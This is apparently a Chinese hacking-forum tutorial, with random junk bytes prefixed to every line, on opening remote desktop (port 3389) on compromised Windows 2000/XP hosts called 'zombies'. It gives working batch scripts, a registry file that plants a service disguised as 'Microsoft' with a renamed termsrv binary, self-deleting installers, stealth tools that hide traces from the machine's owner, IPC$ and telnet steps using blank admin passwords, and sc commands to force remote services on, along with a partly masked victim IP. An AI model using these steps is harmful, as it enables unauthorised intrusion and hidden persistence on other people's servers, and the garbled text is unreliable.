[hide=60] 1.打开记事本,编辑内容如下:
C]�K|��;VQ echo [Components] > c:\sql
w N9I �)hB echo TSEnable = on >> c:\sql
�BXy�g� ?� sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
Fu:VRul=5$ 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
h^ea�V,x>=
�lAz.��I� 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
^2}0��lP| 地址:
www.netsill.com/rots.zip H-�>J.5~,K 使用方法:
V9qA.N�V2 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
��,�[��&@? �0��q(}n�v c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
�ZW
�n �j- �JlJy3L8L� 服务端口: 设置终端服务的服务端口。默认是3389。
+��DFG762� 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
���>.N?y@� 使用/fr表示强制重起目标。(如果/r不行,可以允哉飧觯?BR>使用此参数时,端口设置不能忽略。
X�h�jH68S( 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
�E c[-@5�x 运行CMD(2000下的DOS),我们给它开终端!
��IY2ca�Xu 命令如下!
�
�+T02AS� cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
�hD��I�_qZ 上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以 /r,这是普通重启)
0@��[]l{N oA`'���~~! 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
���uH S)�� 因为pro版不能安装终端服务。
B� B*]" gT 如果你确信脚本判断错误,就继续安装好了。
HTu�v_k��E 4`��Qu+&4J 如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
$K�n{x!,"( aa�W(�S K 脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
6tBL?'pG�� /�9�<zG}:B �C5GO?X2�� 3,下载3389自动安装程序-djshao正式版5.0
Ge=+�0W)�& 地址
www.netsill.com/djshao.zip �c.�y�8�x� 说明:
j4>1a�� � 解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\ winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
Y �S )Q#fP l1��X�A9>n 特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持非法内容,请删除韩繁四个版本的win2000服务器版!
zI77��#AUM 3(l^{YC+[7 d[�(Kg�X9 4.下载DameWare NT Utilities 3.66.0.0 注册版
6j�T�+kq) 地址
www.netsill.com/dwmrcw36600.zip aj;OG^(!2_ 安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
F�@
lJk|*_ 复制启动后出现对方桌面。
�57*`y'C�W 在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK。
��O+hN?/>v 6?���u9h�i �~ ��{OBRC 5.
��A]^RV�{P �L5�� ~wX 首先我们制作开启3389的工具
U�1!�6�%�x 先把下面的注册表内容copy一份,另存为3389.reg注册表文件
+Zgh[���a� 注册表内容:
�nw|ls2��� Windows Registry Editor Version 5.00
^�y"5pf�SR [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
@%mJw
u��� "Enabled"="0"
YD1
:m3�l! [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
X,dOF=O�JL "ShutdownWithoutLogon"="0"
�iX,|�;J|] [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
V*HkF���T� "EnableAdminTSRemote"=dword:00000001
w4w[�q�xV> [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
:s|"� �ZR� "TSEnabled"=dword:00000001
t_cNH@^3<3 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
!*#2~�$:�� "Start"=dword:00000002
I[u�%k�ir� [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
G`3/$�{t�i "Hotkey"="1"
A��B92�R�/ [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
HA�JK%�zLc "Start"=dword:00000002
$A"��C1)d; "ErrorControl"=dword:00000001
t/�xW�J�W2 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
w+��c�%Y\: 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
]���Q-*xho 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
<pzC�p�F<� "ObjectName"="LocalSystem"
/~RY{ c@#L "Type"=dword:00000010
{T �EF#�iF "Description"="Microsoft"
xfYDjf �:< "DisplayName"="Microsoft"
H�xe!68{aR 再把下面的内容保存为批处理文件3389.bat
d�J�~AMo�l 安装批处理内容:
O�~�Eju��� copy termsrv.exe eventlog.exe
z�2��:^�Qg regedit.exe /s 3389.reg
.U�RCu�B\{ del 3389.reg
��-�'ff�0l del 3389.exe
G
92\`� �Q del 3389.bat
aYc*v5Q�N3 用winrar制作成exe自解压缩包
RJ+�i~;-�� @,b��tQ_'X 61.188.***.*** user:administrato pass:空
Fo
�
K!JX* 先使用工具letmein判断其操作系统
X.�^S�@3[� letmein \\ip -all -d
i> �}P� �V TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
Ub�DRzu��m 再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
$2lrP]`>j. 应该没有开启了
<7-�Qn(m, 建立ipc连接
��t�.��0�F copy工具过去
�^lA�D�q'] net use \\ip\ipc$ "pass" /user:name
[Aqy�%mbG� copy file \\ip\admin$\system32
:Y/>] t�S4 用opentelnet开对方的telnet
VHwAO:+-�� opentelnet \\ip name pass 1 99
7{�0;��<@� 用telnet进入
?4�p\u�j�c 进入到对方的winnt\system32\
X�6hm,�0�[ 目录
,�T:U�k*Bj 解压缩3389.exe
Q7u/k$qN�� 运行安装批处理3389.bat
�jx*jY�il� 现在我们把对方重起一下,用reboot
-.X�I�CK�z �"�N'|N�., prJ]u���H, xLID�@9Hbu \v|nRn�,`- 7.
2/[�J<c\G �9eG�{"0) 检查对方是否真的禁用了Terminal server
��s.VtmAH� C:\>sc \\xxx.xxx.xxx.xxx qc termservice
#�m�
%�ZW3 [SC] GetServiceConfig SUCCESS
of?�hP1kl[ SERVICE_NAME: termservice
K9\�p=H^T7 TYPE : 10 WIN32_OWN_PROCESS
H?\���b� � START_TYPE : 4 DISABLED
�wrtJ8�O(� ERROR_CONTROL : 1 NORMAL
OQl7#`G!H% BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
TV&��:`k�H LOAD_ORDER_GROUP :
cOz8Y�VR-� TAG : 0
yDmNPk�/�� DISPLAY_NAME : Terminal Services
`XT8}�9�z! DEPENDENCIES :
Fog4m�=b`g SERVICE_START_NAME : LocalSystem
Y�8$�Y]�2� 仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。
k��&TZ� �
�;/hR#>i�b :!',o]"4,k C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
q.xt%`@�aA [SC] ChangeServiceConfig SUCCESS
~�8fy
qE$� 好了,现在我们已经把对方终端服务的启动模式修改成自动了。
7s�gK+�
ip &A�}@@d�� Q7�V�*�~�{ Nu}x`Q�kmr 再检查一便对方终端服务的启动模式
�G3[X�.%g` C:\>sc \\TEST qc termservice
D�cj�F��$E [SC] GetServiceConfig SUCCESS
|A��g��d�D SERVICE_NAME: termservice
j%�_{��tB� TYPE : 10 WIN32_OWN_PROCESS
.
#+�N?�D< START_TYPE : 2 AUTO_START
yH��Y�qJ|t ERROR_CONTROL : 1 NORMAL
�`;X�~�$uS BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
..Q���$q2. LOAD_ORDER_GROUP :
�)1E[CIaXK TAG : 0
q��e�M�`z� DISPLAY_NAME : Terminal Services
�l�:�' ��0 DEPENDENCIES :
�T;?=,�'u� SERVICE_START_NAME : LocalSystem
�
(��TKn'2 d'b�AM�{R> aX�OW� +$, ��f}1B��-� 启动对方的终端服务
�kf��b*|�� C:\>sc \\xxx.xxx.xxx.xxx start termservice
�VR5CRN�BJ SERVICE_NAME: termservice
'r/+z��a:2 TYPE : 10 WIN32_OWN_PROCESS
�]6)~Sj$ 5 STATE : 2 START_PENDING
WR5@�S&fU` (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
$�9~�6�M*� WIN32_EXIT_CODE : 0 (0x0)
�H� ��YA�< SERVICE_EXIT_CODE : 0 (0x0)
U"�SH
fI:� CHECKPOINT : 0x1
��Ln&'5D#� WAIT_HINT : 0x7530
�G0e]PMeFl >��0^oC[ B �\:�7G1_�o C:\>sc \\xxx.xxx.xxx.xxx query termservice
� ~�Od�E!! SERVICE_NAME: termservice
-MA��/:�EB TYPE : 10 WIN32_OWN_PROCESS
nu=yE�$BN{ STATE : 4 RUNNING
Nj��p�?/r� (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
O1C|�{
��M WIN32_EXIT_CODE : 0 (0x0)
�2�b&&�3u8 SERVICE_EXIT_CODE : 0 (0x0)
.zm/GtOV@� CHECKPOINT : 0x0
ON�.1�'Wk? WAIT_HINT : 0x0[/hide]
